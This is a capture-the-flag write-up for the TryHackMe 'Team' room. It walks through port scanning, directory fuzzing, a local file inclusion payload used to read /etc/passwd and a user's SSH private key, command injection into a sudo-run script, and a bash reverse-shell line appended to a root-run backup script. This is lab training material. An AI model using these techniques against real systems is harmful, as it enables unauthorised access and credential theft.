Team — TryHackMe


This is the write-up for beginner friendly boot2root machine from TryHackMe named Team.This room is available here: https://tryhackme.com/room/teamcw
The task is simple and that is to get both user and root flag.So as always let’s begun the Enumeration of the box with NMAP.
Enumeration
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.167.14
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.167.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:14 EST
Nmap scan report for 10.10.167.14
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 108.33 seconds
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:26 EST
Nmap scan report for 10.10.167.14
Host is up (0.052s latency).PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
| 256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_ 256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 5.4 (85%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 62.32 ms 10.8.0.1
2 61.12 ms 10.10.167.14OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds
So we have 3 ports open. Port 21 is running FTP and uses vsftpd 3.0.3. A quick searchsploit on this version does not show any know vulnerabilities and also there is no anonymous login available.
Port 22 has OpenSSH 7.6p1 running. This is also relatively new version but might have user enumeration possible. We will keep that in mind and will carry on.
Lets explore Port 80.Putting in the IP Address on to the Browser gives us Default Apache2 It works page. Did some enumeration here but did not find anything.
Entry in /etc/hosts
After making in the entry in to the /etc/hosts for the IP Address of the target along with a name, gives us a new web-page with http://team.thm:
10.10.96.20 team.thm

Let’s check if we can brute force directories on this webpage using ffuf
FFUF Scan
┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://team.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c /'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v1.2.1
________________________________________________:: Method : GET
:: URL : http://team.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________scripts [Status: 301, Size: 306, Words: 20, Lines: 10]
index.html [Status: 200, Size: 2966, Words: 140, Lines: 90]
images [Status: 301, Size: 305, Words: 20, Lines: 10]
assets [Status: 301, Size: 305, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 5, Words: 1, Lines: 2]
[Status: 200, Size: 2966, Words: 140, Lines: 90]
.html [Status: 403, Size: 273, Words: 20, Lines: 10]
.php [Status: 403, Size: 273, Words: 20, Lines: 10]
server-status [Status: 403, Size: 273, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 2181 req/sec :: Duration: [0:14:39] :: Errors: 0 ::
Nothing much here apart from robots.txt. Let’s check it out:

There was no directory name “dale”, may be it is a username.Let’s keep it mind and keep enumerating. The Hint says a “dev” site and talks about LFI. Update /etc/hosts file with the following:
10.10.96.20 dev.team.thm team.thm
Replace the IP Address with the one which you got and browse to http://dev.team.thm

Click the Place holder link:

Tried some LFI payloads here and this gave a positive result:
http://dev.team.thm/script.php?page=./../../../etc/passwd

Ah, we see the user dale,may be we can access his home directory:

Yes we can and this gives is our user flag.
LFI to RCE
Now we know that we have a LFI vulnerability, tried to do check for Apache Log Poisoning, SSH Log Poisoning but we did not have access to those logs.So enumerated the files which we can access using few word list:
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI
LFI-gracefulsecurity-linux.txt from SecLists proved to be fruitful.Captured one request in BurpSuite and send it to Intruder:

And used the same file as payload and got an interesting result:

We can read the Private Key for use “dale”. Let’s use this and login to the target after removing all ‘#’ from the key:
chmod 600 id_rsa 130 ⨯
ssh -i id_rsa dale@10.10.210.177

Privilege Escalation
Transfer Linux Smart Enumeration Script on to the target and run it:

So user “dale” can run /home/gyles/admin_checks
as user “gyles”. Checkout what is on this file:
dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bashprintf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is "
$error 2>/dev/nulldate_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bakprintf "Stats have been backed up\n"
From this script we can see that we can inject commands while running the above script as user “gyles” because user’s input is not sanitized and used inside the script:

Upgrade shell by running:
/usr/bin/script -qc /bin/bash /dev/null
Ran LSE again, but didn’t got anything interesting.Ran pspy to check if any thing interesting is running:

From the above output /usr/local/bin/main_backup.sh
is running as root (UID=0) and user “gyles” can edit script as he belongs to “admin” group:

Let’s put in a reverse shell code in to this script and also start a netcat listener:
bash -i >& /dev/tcp/10.8.98.192/9999 0>&1

And after a minute or so:

That it. We are root. Thanks for reading.
P.S. User dale is a member of “lxd” group. Their is a possible way to get root if user is a member of “lxd” group. I haven’t tried that yet, but will look at that later.